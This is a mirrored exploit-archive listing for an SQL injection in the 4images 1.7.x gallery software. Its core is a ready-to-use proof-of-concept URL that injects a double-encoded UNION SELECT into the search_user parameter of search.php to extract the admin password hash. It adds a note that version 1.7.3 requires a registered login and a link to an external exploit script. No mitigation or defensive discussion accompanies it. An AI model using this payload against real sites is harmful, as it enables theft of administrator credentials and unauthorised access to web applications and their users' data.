Advertisement




Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006100072

Below is a copy:

/****************************************/
http://www.w4cking.com

Product:
4images 1.7.x
http://www.4homepages.de

Vulnerability:
SQL injection

Notes:
- SQL injection can be used to obtain password hash
- for version 1.7.3, you must log in as a registered user

POC:
<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20
user_password%20from%204images_users%20where%20user_name=%2527ADMIN

Original advisory with exploit script (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1037

/****************************************/

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.